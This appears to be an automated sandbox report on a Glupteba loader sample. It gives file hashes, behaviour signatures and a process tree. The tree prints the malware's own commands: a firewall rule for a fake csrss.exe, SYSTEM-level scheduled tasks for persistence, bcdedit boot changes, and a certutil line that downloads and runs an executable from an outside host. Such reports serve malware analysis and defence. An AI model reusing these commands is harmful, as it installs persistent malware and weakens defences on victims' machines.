Analysis
-
max time kernel
12s -
max time network
162s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
24-05-2022 22:16
General
-
Target
3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
-
Size
3.8MB
-
MD5
a8a06dda58372e281b89e933e33e30e7
-
SHA1
86a815d7a725411d48dff6b1457903e7db4f1870
-
SHA256
3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5
-
SHA512
f618c2ed2fe6fcaf068f1074ed4dd4b3e06d54d65f2820b942675645039f381c8a10bc79aa0909b4a9fe4007ba2251741df6c50bad4a31827f7561b3be120a6b
Malware Config
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 1 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Modifies boot configuration data using bcdedit 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 7 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe"C:\Users\Admin\AppData\Local\Temp\3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe"C:\Users\Admin\AppData\Local\Temp\3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
-
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220525001806.log C:\Windows\Logs\CBS\CbsPersist_20220525001806.cab1⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes1⤵
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
-
Filesize
31KB
MD5ea8643a33bebbcecfa5ce199db0f6cc1
SHA13cd26f90d2004370c096fc2f7c551799d98807a5
SHA2562fb71c398670798f5cd1c273366b0a3cd18d766ae1d6c51626a0050b7bee8f01
SHA51212d1abce3040ea6d9e805a77dd7bbfa3fab206a18943355cada1dfb76630ea441be5dd59ec6150b0178a87e39cdb49c40554fc46c7937897d090fc0f89dd0724
-
-
-
-
-
-
-
-
-
-
-
-
Filesize
75KB
MD5aee1c79dd26d34559febb8000f7318e1
SHA112397e42a2255abca9c34155e9b3f247be72ed81
SHA2566f096cf15060b992d66f80c2ccf852f202d5027ee92e29f7c1b7c8e23280699e
SHA512c4d22888318739a0aeedbfd17e751b46e3240bcfe632ac7c5f8ffd63ff0f43df367fb73ddf0ad727e8b3efb891b1ebc9eb94f9a32b9eba4873d5aa32913ea614
-
Filesize
893KB
MD517681ce92e484c7e8f255365e71ad730
SHA1e73b4e458963e02259ca98ecb4831464279bc14b
SHA25634f94f786bf9fdc83178432302d7877d0478e5da8f5442c27b90d104a429b124
SHA512f548f3395c626d528b60c0a9dd78014abc256c6b1f240aa2d418f713aef32d7e3eb66ee1668d38eec3844fc4c480f707ad64f75ac59fd0456ef63060b1a6a6cd
-
-
Filesize
8KB
-
-
Filesize
50.7MB
-
Filesize
3.7MB
-
Filesize
3.7MB
-
Filesize
7.0MB
-
Filesize
3.7MB
-
Filesize
3.7MB
-
Filesize
50.7MB
-
-
Filesize
50.7MB
-
Filesize
3.7MB
-
Filesize
3.7MB
-